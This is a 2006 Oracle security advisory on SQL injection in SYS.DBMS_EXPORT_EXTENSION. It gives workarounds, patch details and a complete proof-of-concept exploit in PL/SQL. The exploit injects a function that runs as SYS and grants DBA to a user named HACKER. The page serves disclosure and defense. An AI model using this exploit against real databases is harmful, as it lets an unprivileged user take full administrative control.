Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
Details The following proof of concept exploit code (0day) injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user HACKER. This exploit is working on Oracle 9i Rel. 2 and Oracle 10g eXpress Edition (XE) too. Workarounds You can revoke the public privilege from public. REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE; The package dbms_export_extension is needed for doing export files. After revoking the public grant, you should assign the execute role on dbms_export_extension to your export user (e.g. SYSTEM) Example -- Create a function in a package first and inject this function. The function will be executed as user SYS. CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER IS FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; END; / CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE IS FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO HACKER'; COMMIT; RETURN(1); END; END; / -- Inject the function in dbms_export_extension DECLARE INDEX_NAME VARCHAR2(200); INDEX_SCHEMA VARCHAR2(200); TYPE_NAME VARCHAR2(200); TYPE_SCHEMA VARCHAR2(200); VERSION VARCHAR2(200); NEWBLOCK PLS_INTEGER; GMFLAGS NUMBER; v_Return VARCHAR2(200); BEGIN INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER'; TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER'; VERSION := '10.2.0.2.0'; GMFLAGS := 1; v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => NEWBLOCK, GMFLAGS => GMFLAGS ); END; / Patch Information Apply Oracle CPU July 2006. Patches for Oracle XE are currently not available. History 21-apr-2006 - Initial version 06-may-2006 - Workaround enhanced. Thanks to Kristina Hackert for the hint. 18-july-2006 - Info from Oracle CPU July 2006 added. © 2006 by Red-Database-Security GmbH - last update 18-july-2006 |
Definition Exploit |